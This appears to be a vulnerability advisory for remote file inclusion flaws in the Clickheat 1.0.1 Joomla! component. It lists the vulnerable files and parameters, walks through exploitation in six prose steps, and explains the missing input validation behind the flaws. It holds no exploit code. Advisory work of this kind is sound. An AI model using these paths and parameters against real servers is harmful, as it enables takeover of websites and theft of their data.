Multiple PHP remote file inclusion vulnerabilities in the Clickheat - Heatmap stats (com_clickheat) component 1.0.1 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) install.clickheat.php, (b) Cache.php and (c) Clickheat_Heatmap.php in Recly/Clickheat/, and (d) Recly/common/GlobalVariables.php; and the (2) mosConfig_absolute_path parameter to (e) _main.php and (f) main.php in includes/heatmap, and (g) includes/overview/main.php.
Clickheat, a Joomla! component, is vulnerable to multiple remote file inclusion (RFI) flaws. Attackers can leverage these vulnerabilities to execute arbitrary PHP code on the server, potentially leading to complete system compromise and data exfiltration.
Step 1: Identify Vulnerable Files: The attacker identifies the vulnerable files within the Clickheat component, such as install.clickheat.php, Cache.php, Clickheat_Heatmap.php, GlobalVariables.php, _main.php, main.php, and main.php in the specified directories.
Step 2: Craft Malicious Payload: The attacker crafts a malicious PHP script designed to execute arbitrary commands or gain control of the server. This script is hosted on a server controlled by the attacker.
Step 3: Construct Exploit URL: The attacker constructs a URL that exploits the RFI vulnerability. This URL typically includes the vulnerable file's path and the mosConfig_absolute_path or GLOBALS[mosConfig_absolute_path] parameter, set to the URL of the attacker's malicious PHP script.
Step 4: Send Exploit Request: The attacker sends the crafted URL to the vulnerable Joomla! installation.
Step 5: Server Processes Request: The Joomla! server receives the request and, due to the vulnerability, attempts to include the file specified by the attacker-controlled URL.
Step 6: Execute Malicious Code: The server executes the attacker's PHP code, granting the attacker control over the server's resources.
The vulnerability stems from the insecure use of the mosConfig_absolute_path and GLOBALS[mosConfig_absolute_path] variables within the Clickheat component. These variables are intended to define the absolute path to the Joomla! installation. However, the component fails to properly sanitize user-supplied input when including PHP files using these variables. This allows an attacker to inject a malicious URL pointing to a PHP script hosted on a remote server. When the vulnerable component attempts to include this URL, the attacker's PHP code is executed on the server, granting them control over the web server and potentially the underlying system. The root cause is a lack of input validation and sanitization, specifically failing to validate the source of the included files, leading to a classic RFI vulnerability.